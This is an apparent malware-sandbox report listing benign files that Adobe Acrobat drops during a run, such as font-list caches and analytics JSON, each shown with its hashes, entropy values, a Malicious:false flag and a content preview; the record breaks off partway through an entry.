                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1233
                                                                                                                                                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10880
                                                                                                                                                                                                                                              Entropy (8bit):5.214360287289079
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6648

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10880
                                                                                                                                                                                                                                              Entropy (8bit):5.214360287289079
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                                                                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                                                                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                                                                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                                                                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                              Entropy (8bit):5.341458045803275
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJM3g98kUwPeUkwRe9:YvXKXcKiYpW7aZGMbLUkee9
                                                                                                                                                                                                                                              MD5:56FA1E666643A545FFCF25FC77F4E028
                                                                                                                                                                                                                                              SHA1:80F667605F9E2B74295BAAA718B6E312C2F6BDA2
                                                                                                                                                                                                                                              SHA-256:F7C19BA4587C5FC399291BF801DCED2A64A615B60E348AC052FC5BBB0F2DD7E4
                                                                                                                                                                                                                                              SHA-512:97FE65E6236C11EDAD3ECB28F78F2950E083E8F4179365445714F5F41B28A2A19A87A91AC12442C7B18289A95357BCEAB785E11C1418F095B982EF175339EF6A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                                              Entropy (8bit):5.280284655185208
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfBoTfXpnrPeUkwRe9:YvXKXcKiYpW7aZGWTfXcUkee9
                                                                                                                                                                                                                                              MD5:B78FA554082C0D49CB08FB5ECED3814B
                                                                                                                                                                                                                                              SHA1:E9AB8CD26FF4022BE7D829F4DBC136D591B82E60
                                                                                                                                                                                                                                              SHA-256:C562D630496D962E10E7A1FEFCE81BEF99F610C43DBB49622E5F165BEA437E0B
                                                                                                                                                                                                                                              SHA-512:9000667713F2455533F7C1E73B59A28773379CF35349967588125ACE102CB77B9D526FC4D40DD40613EEAC9339D47823212609B07E79F8A2A7362B6D35275561
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                                              Entropy (8bit):5.258423569930476
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfBD2G6UpnrPeUkwRe9:YvXKXcKiYpW7aZGR22cUkee9
                                                                                                                                                                                                                                              MD5:94C92C780608EDE5FF81087901FE5585
                                                                                                                                                                                                                                              SHA1:37F40DAAE60522662739A712B5BA91659317D7E1
                                                                                                                                                                                                                                              SHA-256:782E45BF96BCE6FEA5FBB57189DAA6F6B9AEA1ABB01545C84312CA1E2D656657
                                                                                                                                                                                                                                              SHA-512:C63CE3A4ACFB96C7ED20F6B74734786A6A92A7304D7F9E98E52C79FA11363FDEB15CAE89C6641D7554C30D5CC2EB38D0556301F9586DE9BD4C47EE4DDCF74661
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                              Entropy (8bit):5.319582315018127
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfPmwrPeUkwRe9:YvXKXcKiYpW7aZGH56Ukee9
                                                                                                                                                                                                                                              MD5:351DAB9DDCD4B2AF430E27734F4E008A
                                                                                                                                                                                                                                              SHA1:BAE30A918BA7F6F94BF1E93CBAF97E2E38908302
                                                                                                                                                                                                                                              SHA-256:F92AAA59A33ED2D4786772083D49B425E95B40D66DC96AF854924158AA4ED56F
                                                                                                                                                                                                                                              SHA-512:17D09E0D0B059C16D2ACDA334F2767C99A82A45A877D46EA12DC48EA54E162BAB9F49CA0DA89638BD3EFEFF4849CD724CF0A87AFF4FD213DA15DD87DB22CEB53
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1123
                                                                                                                                                                                                                                              Entropy (8bit):5.6844257278763815
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Yv6XcKnia+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSSL:YvnKiLhgy6SAFv5Ah8cv/SL
                                                                                                                                                                                                                                              MD5:4AA76F24A3357F910DDFE62F17B2BF90
                                                                                                                                                                                                                                              SHA1:1DC0B017D00C2310F8E11482E4EE90A9E8451178
                                                                                                                                                                                                                                              SHA-256:67F3158F2EF600027493DEA65570C300BB20F30DB35693833A6B7DB993904658
                                                                                                                                                                                                                                              SHA-512:E0ADBDF7F2DCC78C5D141AB1B38D3CCF9B7815E21C112A70229A5001D765A975BC043C73E7B94995AF5DB1099BACF3705862291EE0DDB5E661E4730B16CD773C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.262251339579728
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf8dPeUkwRe9:YvXKXcKiYpW7aZGU8Ukee9
                                                                                                                                                                                                                                              MD5:0D9172F7F5C9F153929F28E4F07888AE
                                                                                                                                                                                                                                              SHA1:9C2E67C3459A0B63F2574514AD294797D3DDAC49
                                                                                                                                                                                                                                              SHA-256:DB77ABAE316C158008E73E25BDD1C8D87A7F822946AF0DAFCA8A313E88604899
                                                                                                                                                                                                                                              SHA-512:6534598ACFDCC259F90783404CAD858DEB422CAF714D464E8FD0F991B8BFC9C7A5D2B22CE2DA3ADFAB8966C58C53D660ECE041ACB922C44F6923F2F9C58F20D7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):292
                                                                                                                                                                                                                                              Entropy (8bit):5.264177993824607
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfQ1rPeUkwRe9:YvXKXcKiYpW7aZGY16Ukee9
                                                                                                                                                                                                                                              MD5:D3B017B0ED0324877076F42F93684670
                                                                                                                                                                                                                                              SHA1:657647418924335BADAEAB87BAED78A197EED223
                                                                                                                                                                                                                                              SHA-256:A87206504DF8AAF8AEDB932E7D894A39E2A58C34A52CE98775ACFBAB31F28FF9
                                                                                                                                                                                                                                              SHA-512:31F57435011E883D6D8F660D80611ADE7247B10BE4204C0C85BD14C78313D3EDAD2925DFFE3322535E8AA6FBD33207E0C4CF846AF5E763614631E7DCC5356F57
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.283222846336828
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfFldPeUkwRe9:YvXKXcKiYpW7aZGz8Ukee9
                                                                                                                                                                                                                                              MD5:824912F311F5741668272CF55F8DB1EA
                                                                                                                                                                                                                                              SHA1:AEEB3608A3408A5F6D41F11402B3A95E22FF1F7A
                                                                                                                                                                                                                                              SHA-256:92C7AA4311E488A88DB1C00CCD180F04F01CCAD736C891A36C1D25868530AE5C
                                                                                                                                                                                                                                              SHA-512:0BBF0910D5BA22F5D26198761CCF7106EF058A564EB0A2C04CF86EA5F5D3397E6CB0D4231AE7C9103FB8161DD44C3B6B15BA65C925E51723A8F89F196B49889F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):295
                                                                                                                                                                                                                                              Entropy (8bit):5.290101400730302
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfzdPeUkwRe9:YvXKXcKiYpW7aZGb8Ukee9
                                                                                                                                                                                                                                              MD5:1AB5D76A616245FF72CFBFB406E9D8E3
                                                                                                                                                                                                                                              SHA1:3FBA0D66547D21E5D82D4E1E03DADEC809878042
                                                                                                                                                                                                                                              SHA-256:6FC514C5A38A7D47F62EEE8FA1B360E3697348AD5C21DB7EEF5B69376DAB9F8D
                                                                                                                                                                                                                                              SHA-512:ED1B9C756618A8545E2AA90C31EE3DEEAE7F8C7CB78C13201E2BA009242DCFB3D7E41F4079DD22E2F0404915D5C76FCAD7D33A0E9FDD8B68908F85C541FFDEEC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):289
                                                                                                                                                                                                                                              Entropy (8bit):5.270677960446839
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfYdPeUkwRe9:YvXKXcKiYpW7aZGg8Ukee9
                                                                                                                                                                                                                                              MD5:D9CF91BFA7380BE2CC2CB1BF78AA410A
                                                                                                                                                                                                                                              SHA1:CE03121E7C85F916F14933C5D5D95776A348549E
                                                                                                                                                                                                                                              SHA-256:0A213EC9AFA5C13AF000C4421A67E4FCD920EBD8AE9A177FA7BB8853F6326EBA
                                                                                                                                                                                                                                              SHA-512:53BDE86205B5377D66F82A6C89FC5C9C8FD076891BA5041E6BC9695A43AD1485B7DA031FB827124C545CE67375686B1A7A67002F770A69A6AB2D6ADA35966835
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                                              Entropy (8bit):5.25651109110663
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJf+dPeUkwRe9:YvXKXcKiYpW7aZG28Ukee9
                                                                                                                                                                                                                                              MD5:57F7B7D63B095D7A524CFAD016F72FA5
                                                                                                                                                                                                                                              SHA1:77A53AC174FBA59EDD8040A4821FBB9F1EA6DE67
                                                                                                                                                                                                                                              SHA-256:A74EA2AB1FF615E31FD88BEA4E06F0912B2BEB6D1FA761E4A463A398E7CBF4D2
                                                                                                                                                                                                                                              SHA-512:B625E1AB9323517BABC4EC4946EB20EA62396342020CA6B5E174E9351774BC08C3A5227AB8E6EC229F8DC2CA47765D77BEBD359BEC39E80E86A40629F09CF765
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):291
                                                                                                                                                                                                                                              Entropy (8bit):5.254426584165743
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfbPtdPeUkwRe9:YvXKXcKiYpW7aZGDV8Ukee9
                                                                                                                                                                                                                                              MD5:FF8D80C9F1CD11D2A9DBF1FDFD685A89
                                                                                                                                                                                                                                              SHA1:68A487F59688667AE0EFC0DD5BBF877EE186950A
                                                                                                                                                                                                                                              SHA-256:5C533FA37BF4CADD6F05AAA38CAF9A4C64C96175C1BE755076814F9616728766
